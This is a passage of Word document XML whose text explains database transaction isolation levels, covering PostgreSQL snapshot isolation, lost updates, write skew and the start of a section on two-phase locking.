    <w:p w14:paraId="295BA1CA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A82E6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN A: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C7418" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN A: SELECT balance → 1000  (snapshot at T1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DE7B95" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37EC2D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  TXN B commits: UPDATE balance = 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C6D83" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB21B65" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN A: SELECT balance → 500   (NEW snapshot at T2 — sees B's commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1E59B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                                 (non-repeatable read: different from T1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51624526" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203947A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  This prevents dirty reads (never sees uncommitted data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63E5B6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Does NOT prevent non-repeatable reads or phantom reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79704557" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63210CB8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1E143" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Most OLTP: acceptable — brief non-repeatability rarely causes bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B88D4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">             if transactions are short and don't read same data twice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719CFD69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB2A187" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Application must handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB7F9A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Do not read same data twice expecting same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AFC55" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Do not make decisions based on multi-statement reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF0400" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  For critical consistency: use SELECT FOR UPDATE or higher isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E493389" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repeatable Read — the snapshot guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B102B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB83623" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Each transaction sees a consistent snapshot taken at transaction start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901A180" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>No dirty reads, no non-repeatable reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D7B99" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5A9B7D17" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>PostgreSQL implementation: Snapshot Isolation (MVCC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AB366" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction gets snapshot ID at BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6113F1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Reads: only see data committed BEFORE snapshot was taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046CDC1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Writes: go to new versions of rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175050B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3529A9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>TXN A (snapshot at T=1000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C268A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEGIN (snapshot = 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF5692" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT balance → 1000  (reads version committed before T=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D990218" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F23182" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>TXN B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4361F316" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  UPDATE balance = 500; COMMIT at T=1001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB768F1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4196C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>TXN A:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21423719" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SELECT balance → 1000  (still! snapshot is T=1000, ignores T=1001 commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044875A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Repeatable: same query returns same result within transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD64AA7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAD158" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Write-write conflicts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DED5D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  If TXN A and TXN B both try to UPDATE same row:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C8052A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B0A2D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN A: UPDATE accounts SET balance = 900 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F424C2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         (A acquires row lock, modifies row, keeps lock until commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D70F612" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219CF253" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN B: UPDATE accounts SET balance = 800 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D090F47" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         (B tries to acquire row lock — blocked because A holds it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9BE850" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C36E2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN A: COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A422C49" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         (releases lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A99821" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DF8E4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TXN B: sees the committed row from A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54820091" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         Under PostgreSQL SI: TXN B sees A's committed value = 900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5CAE4B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         TXN B updates: 900 → 800 (not 1000 → 800)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70973122" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344E6E6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Lost update prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B0801" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    The "first-committer-wins" rule: if B's snapshot is stale relative to A's commit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004EF159" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    B must detect this and either abort or re-read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D94C8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591B85E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    PostgreSQL Repeatable Read: actually prevents lost updates (unlike SQL standard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AABD0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    If TXN B's UPDATE would create a lost update: B gets error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E3735" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    "ERROR: could not serialize access due to concurrent update"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418D4A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1FF4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Write skew (NOT prevented by Repeatable Read):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC0C81" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Doctors on-call example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08A167" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A reads: 2 doctors on call (snapshot sees 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524E607" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B reads: 2 doctors on call (snapshot sees 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33996CE4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN A writes: Alice off-call (no conflict with TXN B — different row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF33235" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN B writes: Bob off-call (no conflict with TXN A — different row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9EAC1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Both commit: 0 doctors on call (constraint violated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FBD3C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB9FCE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Repeatable Read does NOT prevent this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E892A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Each transaction's reads are stable within its snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30D63D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    But the combination of reads and writes across both transactions violates constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97D506" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    The writes don't conflict (different rows) so no detection occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4327A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serializable — the strongest isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1505C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50948B53" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Transactions execute as if they were serial (one after another)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1C7F1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>No anomaly is possible (by definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58504BC1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="1B7717D6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>Two implementation approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA35B9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="484BD0E6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>1. Two-Phase Locking (2PL) — the traditional approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99E777" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5186E3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Phase 1 (Growing): acquire locks, never release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B09751" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Phase 2 (Shrinking): release locks, never acquire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A9EB26" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AED9C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Read:  acquire shared lock (S lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5CAB6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          multiple transactions can hold S lock simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E8806" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Write: acquire exclusive lock (X lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53B34" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          only one transaction can hold X lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CF863" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          X lock incompatible with both S and X locks</w:t>
      </w:r>
    </w:p>
